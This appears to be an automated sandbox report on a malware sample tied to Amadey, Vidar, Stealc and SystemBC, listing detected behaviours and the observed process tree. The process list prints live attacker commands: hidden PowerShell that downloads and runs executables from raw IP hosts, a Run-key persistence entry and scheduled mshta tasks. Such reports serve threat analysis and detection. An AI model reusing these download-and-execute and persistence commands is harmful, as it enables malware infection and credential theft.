Analysis Overview
SHA256
3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
Threat Level: Known bad
The file 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe was found to be: Known bad.
Malicious Activity Summary
GCleaner
Modifies Windows Defender TamperProtection settings
Vidar
Modifies Windows Defender Real-time Protection settings
Systembc family
SystemBC
Detect Vidar Stealer
Vidar family
Modifies Windows Defender DisableAntiSpyware settings
Amadey family
Detects Healer an antivirus disabler dropper
Gcleaner family
Healer family
Stealc family
Healer
Modifies Windows Defender notification settings
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Reads user/profile data of web browsers
.NET Reactor protector
Identifies Wine through registry keys
Reads user/profile data of local email clients
Checks BIOS information in registry
Loads dropped DLL
Checks computer location settings
Windows security modification
Executes dropped EXE
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
AutoIT Executable
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Program crash
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies registry class
Kills process with taskkill
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-02 02:18
Signatures
Amadey family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-02 02:18
Reported
2025-03-02 02:21
Platform
win7-20241010-en
Max time kernel
71s
Max time network
154s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 944 set thread context of 1272 | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1640 set thread context of 2732 | N/A | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe |
| PID 1692 set thread context of 2912 | N/A | C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe
"C:\Users\Admin\AppData\Local\Temp\3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe
"C:\Users\Admin\AppData\Local\Temp\10053360101\pqe7mAG.exe"
C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe
"C:\Users\Admin\AppData\Local\Temp\10057860101\pqe7mAG.exe"
C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10057880101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 500
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1036
C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe
"C:\Users\Admin\AppData\Local\Temp\10057900101\q3na5Mc.exe"
C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe
"C:\Users\Admin\AppData\Local\Temp\10057910101\z3SJkC5.exe"
C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe
"C:\Users\Admin\AppData\Local\Temp\RoboTaskLite.exe"
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Users\Admin\AppData\Roaming\Securitynotepadgad_debug\RoboTaskLite.exe
C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10057920101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 500
C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10057930101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef79b9758,0x7fef79b9768,0x7fef79b9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1368 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1296 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe
"C:\Users\Admin\AppData\Local\Temp\10059480101\1ZXaFij.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3492 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3612 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe
"C:\Users\Admin\AppData\Local\Temp\10059490101\1ZXaFij.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3760 --field-trial-handle=1276,i,9185862679981382503,8781301621051745373,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvytlqfl.cmdline"
C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe
"C:\Users\Admin\AppData\Local\Temp\10059590101\Gidqgok.exe"
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Users\Admin\AppData\Local\Temp\ToolSecurityBvg.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC50A0.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\Admin\AppData\Roaming\installer.ps1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 1216
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2zer-yl.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A80.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5A7F.tmp"
C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe
"C:\Users\Admin\AppData\Local\Temp\10059600101\Gidqgok.exe"
C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe
"C:\Users\Admin\AppData\Local\Temp\10061070101\bwuGbC2.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe
"C:\Users\Admin\AppData\Local\Temp\10061080101\bwuGbC2.exe"
C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe
"C:\Users\Admin\AppData\Local\Temp\10000490101\netdriver.exe"
C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe
"C:\Users\Admin\AppData\Local\Temp\10062560101\UXwM0dy.exe"
C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe
"C:\Users\Admin\AppData\Local\Temp\10062570101\b6d1c8e25e.exe"
C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe
"C:\Users\Admin\AppData\Local\Temp\10062720101\7ee58999f0.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn Me3u4ma006G /tr "mshta C:\Users\Admin\AppData\Local\Temp\1Y5lWQwsW.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BGOCQVVKCX0QWYVMYADESIX7SF6FWWAB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "fEiHYmaxCUY" /tr "mshta \"C:\Temp\r2EtpuBU9.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\r2EtpuBU9.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062790101\JqGBbm7.exe"
C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
"C:/Users/Admin/AppData/Roaming/winsvcs/WindowsPrinterService.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {9A18A70E-EF90-4148-9E14-42DC99609553} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
C:\ProgramData\nlfqre\ssomfop.exe
C:\ProgramData\nlfqre\ssomfop.exe
C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"
C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe
"C:\Users\Admin\AppData\Local\Temp\10062890101\d5e3ec016c.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 508
C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe
"C:\Users\Admin\AppData\Local\Temp\10062900101\aa27374f64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6ba9758,0x7fef6ba9768,0x7fef6ba9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
